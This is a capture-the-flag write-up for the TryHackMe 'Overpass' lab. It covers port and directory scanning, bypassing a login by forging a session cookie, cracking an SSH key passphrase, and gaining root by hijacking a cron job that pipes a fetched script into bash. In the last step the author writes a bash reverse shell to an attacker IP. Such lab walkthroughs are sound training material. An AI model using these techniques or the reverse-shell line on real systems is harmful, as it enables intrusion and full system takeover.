# TryHackMe-Overpass ## NMAP ``` nmap -sC -sV 10.10.124.118 Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-10 22:35 PKT Nmap scan report for 10.10.124.118 Host is up (0.18s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA) | 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA) |_ 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Overpass Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ## PORT 80 Download the file to see what's in it. There's also a source code in`golang` let's see maybe we can find something it in so we can exploit that binary. ## Gobuster ``` root@kali:~/TryHackMe/Easy/Overpass# gobuster dir -u http://10.10.124.118 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.124.118 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/11/10 22:50:19 Starting gobuster =============================================================== /img (Status: 301) /downloads (Status: 301) /aboutus (Status: 301) /admin (Status: 301) /css (Status: 301) ``` We see that there's an `/admin` page Looking at the source we can see 3 javascript files , we are interested in `login.js` so let's view the source code This is a vulnerabale piece of code that would make authenticate a user with invalid crdentials if he has a session so let's make a fake `SessionToken` with a browser extension named `EditThisCookie` On refreshing the page we will get the ssh key for `james` But it's asking for the passphrase of `id_rsa` so we can get the hash of `id_rsa` with `ssh2john` and crack it with `johntheripper` ``` root@kali:~/TryHackMe/Easy/Overpass# /usr/share/john/ssh2john.py id_rsa > ssh_hash root@kali:~/TryHackMe/Easy/Overpass# john --wordlist=/usr/share/wordlists/rockyou.txt ssh_hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status james13 (id_rsa) 1g 0:00:00:03 31.13% (ETA: 20:37:40) 0.3125g/s 1444Kp/s 1444Kc/s 1444KC/s play646..play47 Session aborted ``` Then `ssh james@ -i id_rsa` ## Privilege Escalation Host `linpeas.sh` on local machine and transfer it to target machine I didn't find anythin with linpeas so next thing that I looked at was a file `.overpass` in `james`'s home directroy , reading the content of the file it was gibberish `,LQ?2>6QiQ$JDE6>Q[QA2DDQiQD2J5C2H?=J:?8A:4EFC6QN.` I visited https://gchq.github.io/CyberChef/ This password is for `james` but still he is not in group `sudoers` That was a rabbit hole then check for cronjobs ``` james@overpass-prod:~$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # Update builds from latest code * * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash james@overpass-prod:~$ ``` looking at `/etc/hosts` we can change this localhost to our local machine's address and add a reverse shell in bash with path `/downloads/src/buildscript.sh` ``` james@overpass-prod:~$ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 overpass-prod 127.0.0.1 overpass.thm # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters james@overpass-prod:~$ ``` Now making directory `/downloads/src/buildscript.sh` ``` root@kali:~/TryHackMe/Easy/Overpass# mkdir downloads root@kali:~/TryHackMe/Easy/Overpass# cd downloads/ root@kali:~/TryHackMe/Easy/Overpass/downloads# mkdir src root@kali:~/TryHackMe/Easy/Overpass/downloads# echo "bash -i >& /dev/tcp/10.14.3.143/8080 0>&1" > buildscript.sh root@kali:~/TryHackMe/Easy/Overpass/downloads# chmod +x buildscript.sh ``` And just like that we will get the reverse shell as `root` !